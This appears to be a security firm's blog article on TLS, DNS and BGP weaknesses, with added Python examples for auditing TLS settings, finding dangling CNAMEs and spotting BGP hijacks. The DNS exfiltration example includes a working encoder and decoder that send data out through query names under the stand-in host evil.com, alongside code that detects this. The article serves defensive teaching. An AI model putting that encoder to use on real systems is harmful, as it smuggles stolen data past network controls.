The invisible protocols that carry your applications
Your web application relies on layers of network protocols you may never configure directly: TLS for encryption, DNS for name resolution, BGP for internet routing. Flaws in these layers compromise your application regardless of your code quality.
TLS: when encryption falls short
Obsolete versions
TLS 1.0 and 1.1 were formally deprecated in March 2021 (RFC 8996). Both are limited to CBC and RC4 cipher suites and an MD5/SHA-1 based PRF, and their CBC suites are exposed to attacks such as BEAST (TLS 1.0) and POODLE-style padding oracles in flawed implementations. Some SMB applications still accept these versions for backward compatibility, usually because an old client, appliance or integration partner never upgraded.
Weak cipher suites
Even with TLS 1.2, some cipher suites remain weak and should be disabled: CBC suites, which use MAC-then-encrypt and have suffered padding-oracle attacks (Lucky 13); suites with static RSA key exchange, which offer no forward secrecy, so a later compromise of the server key decrypts recorded traffic; and suites with keys shorter than 128 bits, such as 3DES (112 bits effective). What should remain is ECDHE or DHE key exchange with an AEAD cipher (AES-GCM or ChaCha20-Poly1305), which is all TLS 1.3 offers.
Poorly managed certificates
Expired certificates, self-signed certificates in production, no automatic renewal. But also: wildcard certificates covering unrelated domains (one compromised host's key then impersonates all of them), or certificates whose Subject Alternative Names include internal hostnames, which become public through Certificate Transparency logs.
Check: openssl s_client -connect domain.com:443 -servername domain.com shows the certificate chain and the protocol and cipher actually negotiated. To test whether an obsolete version is still accepted, force it with -tls1_1 or -tls1; a handshake failure is the result you want.
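The three TLS checks above (protocol floor, cipher-suite properties, what a hardened configuration looks like) can be expressed against Python's standard ssl module without any network access. The following is an added example, not code from the original page or from CleanIssue: it tags each suite reported by SSLContext.get_ciphers() with the weaknesses listed above, audits a whole context, and builds a client context that passes the audit. The tag names ("non-AEAD", "no-PFS", "short-key") and the cipher string are this example's own choices.

```python
"""Added example: audit an ssl.SSLContext against the rules in this section.

Standard library only. The cipher dictionaries come from SSLContext.get_ciphers();
the tags returned are this example's own naming, not an OpenSSL or Python API.
"""
import ssl


def weak_cipher_reasons(cipher: dict) -> list[str]:
    """Tag one get_ciphers() entry with the weaknesses listed above (empty list = acceptable)."""
    reasons = []
    if not cipher["aead"]:
        reasons.append("non-AEAD")        # CBC mac-then-encrypt (Lucky 13 style) or RC4
    if cipher["kea"] == "kx-rsa":
        reasons.append("no-PFS")          # static RSA key exchange: no forward secrecy
    if cipher["strength_bits"] < 128:
        reasons.append("short-key")       # e.g. 3DES at 112 effective bits
    return reasons


def audit_context(ctx: ssl.SSLContext) -> list[str]:
    """Return human-readable findings for a context: old protocol floor and weak suites."""
    findings = []
    # MINIMUM_SUPPORTED means "whatever the OpenSSL build still allows", i.e. possibly 1.0/1.1.
    if ctx.minimum_version in (ssl.TLSVersion.MINIMUM_SUPPORTED, ssl.TLSVersion.SSLv3,
                               ssl.TLSVersion.TLSv1, ssl.TLSVersion.TLSv1_1):
        findings.append(f"protocol floor {ctx.minimum_version.name}: TLS 1.0/1.1 may be accepted")
    for cipher in ctx.get_ciphers():
        for reason in weak_cipher_reasons(cipher):
            findings.append(f"{cipher['name']}: {reason}")
    return findings


def hardened_client_context() -> ssl.SSLContext:
    """A context that satisfies audit_context(): TLS >= 1.2, ephemeral key exchange, AEAD only."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    # TLS 1.2 suite selection; TLS 1.3 suites are configured separately and are all AEAD with PFS.
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:DHE+CHACHA20")
    return ctx


if __name__ == "__main__":
    legacy = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    legacy.set_ciphers("ALL")   # everything this OpenSSL build still offers
    for line in audit_context(legacy)[:10]:
        print("legacy  :", line)
    print("hardened:", audit_context(hardened_client_context()) or "no findings")
```

The same three rules apply on the server side: the context you hand to your TLS terminator (or the equivalent ssl_ciphers / ssl_protocols directives in a reverse proxy) should produce no findings. The audit looks at configuration, not at a live handshake, so it complements rather than replaces the openssl s_client check above.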
DNS: name resolution can be hijacked
DNS spoofing and cache poisoning
An attacker who controls or forges DNS responses redirects your domain to their server. DNSSEC lets a validating resolver detect forged answers, but it only helps when the zone is signed and the resolver validates, and it remains poorly deployed. Fewer than 10% of .fr domains are DNSSEC-signed.
Dangling DNS
A CNAME record pointing to a cloud service you've deleted. An attacker can claim that service and take over the subdomain. This is a subdomain takeover vector.
Example: staging.myapp.com is a CNAME to the bucket hostname staging.myapp.com.s3.amazonaws.com, and you've deleted the bucket. S3 bucket names are global, so an attacker creates a bucket with the same name and controls the content served on your subdomain. Note that the bucket hostname still resolves: the evidence of a dangling record is the service's NoSuchBucket error, not an NXDOMAIN.
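The check a practitioner wants here is a sweep of every CNAME in the zone against the services where a deleted tenant's hostname can be re-registered. The following is an added example, not code from the original page or from CleanIssue. The zone records, the probe results and the myapp.com names are constructed; the service patterns and the "unclaimed" fingerprints (NoSuchBucket for S3, the GitHub Pages 404 text, NXDOMAIN for a deleted Azure App Service) are illustrative and have to be maintained against each provider's current behaviour. The probe is injected as a function so the logic runs offline; in production it would be a DNS lookup plus an HTTP GET.

```python
"""Added example: flag CNAME records whose target a third party could claim.

The zone and the probe results are constructed; service patterns and fingerprints
are illustrative and must be kept current against each provider.
"""
import re
from collections.abc import Callable

# (owner name, record type, target) as exported from a zone; trailing dots as in zone files.
ZONE = [
    ("www.myapp.com.", "CNAME", "myapp-prod.example-cdn.net."),
    ("staging.myapp.com.", "CNAME", "staging.myapp.com.s3.amazonaws.com."),
    ("blog.myapp.com.", "CNAME", "myapp.github.io."),
    ("old.myapp.com.", "CNAME", "myapp-old.azurewebsites.net."),
    ("api.myapp.com.", "A", "203.0.113.10"),
]

# Services where a deleted tenant's hostname can be re-registered by anyone.
# Some keep answering DNS for any name (wildcard) and signal "unclaimed" only in
# the HTTP body, so each entry carries an optional body fingerprint.
CLAIMABLE = [
    (re.compile(r"\.s3(\.[a-z0-9-]+)?\.amazonaws\.com\.$"), "AWS S3", "NoSuchBucket"),
    (re.compile(r"\.github\.io\.$"), "GitHub Pages", "There isn't a GitHub Pages site here"),
    (re.compile(r"\.azurewebsites\.net\.$"), "Azure App Service", None),  # deleted app: NXDOMAIN
]

Probe = Callable[[str], tuple[bool, str]]  # target -> (resolves?, HTTP body or "")


def find_dangling(zone, probe: Probe) -> list[tuple[str, str, str, str]]:
    """Return (owner, target, service, evidence) for CNAMEs that look claimable."""
    findings = []
    for owner, rtype, target in zone:
        if rtype != "CNAME":
            continue
        for pattern, service, fingerprint in CLAIMABLE:
            if not pattern.search(target):
                continue
            resolves, body = probe(target)
            if not resolves:
                findings.append((owner, target, service, "NXDOMAIN"))
            elif fingerprint and fingerprint in body:
                findings.append((owner, target, service, f"body matches {fingerprint!r}"))
    return findings


# Constructed probe results standing in for real DNS lookups + HTTP GETs.
FAKE_PROBE = {
    "myapp-prod.example-cdn.net.": (True, "<html>welcome</html>"),
    "staging.myapp.com.s3.amazonaws.com.": (True, "<Error><Code>NoSuchBucket</Code></Error>"),
    "myapp.github.io.": (True, "<h1>404</h1><p>There isn't a GitHub Pages site here.</p>"),
    "myapp-old.azurewebsites.net.": (False, ""),
}


def fake_probe(target: str) -> tuple[bool, str]:
    return FAKE_PROBE.get(target, (True, ""))


if __name__ == "__main__":
    for finding in find_dangling(ZONE, fake_probe):
        print(*finding, sep="  ")
```

Two caveats for a real sweep: follow CNAME chains to the final target before matching, since the claimable hostname is often two hops away, and run the sweep on a schedule, because a record becomes dangling the day someone deletes the resource, not the day it was created.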
DNS exfiltration
DNS is rarely filtered by firewalls, and even when outbound port 53 is blocked, the internal resolver forwards queries to the authoritative server the attacker runs. Data is exfiltrated by encoding it in query names, for instance <base32-or-hex-encoded-data>.evil.com, using an alphabet that fits DNS labels (base64's +, / and = do not). Each label carries at most 63 bytes and each query name 253, so the data goes out a few dozen bytes at a time, and the stream shows up as many long, high-entropy, never-repeated subdomains under one domain.
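To make the channel and its signature concrete, the following added example (not code from the original page or from CleanIssue) shows both sides: an encoder that packs a payload into DNS-legal query names under a constructed attacker zone, the matching decoder, and detection logic run over constructed query-log lines. The log format "<time> <client> <qname> <qtype>", the evil.com zone, the payload and the thresholds are all this example's assumptions.

```python
"""Added example: DNS exfiltration, both sides, plus detection over a query log.

encode_for_dns/decode_from_dns carry data in query names within the DNS limits
(63-byte labels, DNS-safe alphabet); find_exfil is detection logic run over
constructed log lines of the form "<time> <client> <qname> <qtype>".
"""
import base64
import collections
import math
import random

LABEL_MAX = 63          # RFC 1035: a label is at most 63 bytes
PARENT = "evil.com"     # constructed attacker-controlled zone
SECRET = random.Random(7).randbytes(600)   # constructed "stolen" payload, deterministic


def encode_for_dns(data: bytes, parent: str, labels_per_query: int = 2) -> list[str]:
    """Attacker side: base32 (DNS-safe alphabet) cut into 63-char labels, sequence label first."""
    text = base64.b32encode(data).decode().rstrip("=").lower()
    labels = [text[i:i + LABEL_MAX] for i in range(0, len(text), LABEL_MAX)]
    queries = []
    for seq, i in enumerate(range(0, len(labels), labels_per_query)):
        chunk = labels[i:i + labels_per_query]
        queries.append(".".join([f"{seq:04x}", *chunk, parent]))  # seq lets the receiver reorder
    return queries


def decode_from_dns(queries: list[str], parent: str) -> bytes:
    """Receiver side (the authoritative server for `parent`): reassemble in sequence order."""
    chunks = {}
    for q in queries:
        labels = q[: -len(parent) - 1].split(".")
        chunks[int(labels[0], 16)] = "".join(labels[1:])
    text = "".join(chunks[k] for k in sorted(chunks)).upper()
    text += "=" * (-len(text) % 8)          # restore base32 padding
    return base64.b32decode(text)


def shannon_entropy(s: str) -> float:
    counts = collections.Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def find_exfil(log_lines, min_distinct=5, min_len=40, min_entropy=3.5):
    """Group queries by (client, registrable domain); flag many distinct, long, high-entropy subdomains.

    The registrable domain is approximated as the last two labels; use the public
    suffix list in production (co.uk and friends).
    """
    subs = collections.defaultdict(set)
    for line in log_lines:
        _ts, client, qname, _qtype = line.split()
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:
            continue                      # nothing in front of the registrable domain
        subs[(client, ".".join(labels[-2:]))].add(".".join(labels[:-2]))
    suspects = []
    for (client, parent), names in subs.items():
        if len(names) < min_distinct:
            continue
        avg_len = sum(len(n) for n in names) / len(names)
        avg_ent = sum(shannon_entropy(n.replace(".", "")) for n in names) / len(names)
        if avg_len >= min_len and avg_ent >= min_entropy:
            suspects.append((client, parent, len(names), round(avg_ent, 2)))
    return suspects


def build_sample_log() -> list[str]:
    """Constructed query log: ordinary lookups plus the exfiltration queries for SECRET."""
    benign = [f"2024-05-02T10:00:0{i} 10.0.0.5 {h}.example.com A"
              for i, h in enumerate(["www", "mail", "api", "cdn", "static", "docs"])]
    exfil = [f"2024-05-02T10:00:10 10.0.0.5 {q} TXT" for q in encode_for_dns(SECRET, PARENT)]
    return benign + exfil


if __name__ == "__main__":
    print("round trip ok:", decode_from_dns(encode_for_dns(SECRET, PARENT), PARENT) == SECRET)
    for suspect in find_exfil(build_sample_log()):
        print("possible DNS exfiltration:", suspect)
```

The detector deliberately keys on volume, length and entropy together: CDN and anti-virus vendors also emit long machine-generated subdomains, so any single signal alone produces noise. Tune the thresholds on your own resolver logs and allowlist the domains that legitimately trip them.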
BGP: internet routing is vulnerable
BGP hijacking
BGP is the routing protocol between autonomous systems (internet providers and large networks). It relies on mutual trust, with no cryptographic verification of who may announce which prefix. An operator, malicious or by mistake, can announce your IP prefixes, or a more specific sub-prefix that wins longest-prefix matching, and intercept your traffic. In April 2018, Amazon Route 53 prefixes were hijacked so that forged DNS answers sent MyEtherWallet users to a phishing site, stealing cryptocurrency.
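What you can do from the outside is watch the global routing table for announcements that conflict with your own. The following added example (not code from the original page or from CleanIssue) applies the two cases just described, an exact-prefix announcement from a foreign origin and a more specific sub-prefix, to constructed route-collector lines. The prefixes, ASNs and the "prefix,origin_asn,as_path" line format are this example's assumptions; real input would come from a route collector or a monitoring service.

```python
"""Added example: detect announcements that would hijack your prefixes.

MY_PREFIXES and the feed lines are constructed (documentation ranges, private ASNs).
The line format "prefix,origin_asn,as_path" is this example's own.
"""
import ipaddress

# Prefixes you originate and the ASN you originate them from.
MY_PREFIXES = {
    ipaddress.ip_network("203.0.113.0/24"): 64500,
    ipaddress.ip_network("2001:db8::/32"): 64500,
}

# Constructed snapshot of what route collectors see.
FEED = """\
203.0.113.0/24,64500,64496 64500
203.0.113.0/24,64501,64497 64501
203.0.113.128/25,64501,64497 64501
203.0.113.0/25,64500,64496 64500
198.51.100.0/24,64502,64498 64502
2001:db8:1::/48,64503,64499 64503
"""


def classify(prefix, origin, my_prefixes):
    """Return (kind, covered prefix) when an announcement conflicts with ours, else None."""
    for mine, expected in my_prefixes.items():
        if prefix.version != mine.version:
            continue
        if prefix == mine and origin != expected:
            return "origin-hijack", mine            # same prefix, foreign origin: competes by path
        if prefix != mine and prefix.subnet_of(mine) and origin != expected:
            return "more-specific-hijack", mine     # longer prefix wins longest-match, whatever the path
    return None


def scan(feed: str, my_prefixes=MY_PREFIXES):
    """Parse feed lines and return (kind, prefix, origin, our covered prefix, as_path) findings."""
    findings = []
    for line in feed.splitlines():
        if not line.strip():
            continue
        prefix_s, origin_s, as_path = line.split(",")
        hit = classify(ipaddress.ip_network(prefix_s), int(origin_s), my_prefixes)
        if hit:
            kind, mine = hit
            findings.append((kind, prefix_s, int(origin_s), str(mine), as_path))
    return findings


if __name__ == "__main__":
    for finding in scan(FEED):
        print(*finding)
```

Your own deaggregation (203.0.113.0/25 from AS64500 above) is not flagged, while the foreign /25 is, even though both are more specific: that is the distinction that matters for longest-prefix matching. The check is origin-based only, so an attacker who forges the AS path to end in your ASN slips past it; alerting on unexpected upstream ASNs in the path closes part of that gap.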
Impact for an SMB
You don't control BGP directly, but you can:
Cross-cutting defenses
At CleanIssue, we check TLS configuration, DNS records, and network security headers during every audit. Request your audit call.
Related articles
Three adjacent analyses to keep exploring the same attack surface.
Kubernetes: 7 critical vulnerabilities we find in audits
The seven most frequent Kubernetes configuration flaws in our audits: RBAC, secrets, network policies, privileged pods, and more.
ZooKeeper and CVE-2026-24308: when configuration leaks into logs
CVE-2026-24308 shows how mishandled configuration values can expose sensitive data in ZooKeeper client logs.
AWS, GCP, Azure cloud security: the 10 most common IAM mistakes
The IAM configuration mistakes that expose your cloud infrastructure: excessive permissions, static credentials, missing MFA, and more.
Sources
Editorial analysis based on official vendor, project, and regulator documentation.
Related services
If this topic maps to a real risk in your stack, these are the most relevant CleanIssue audits.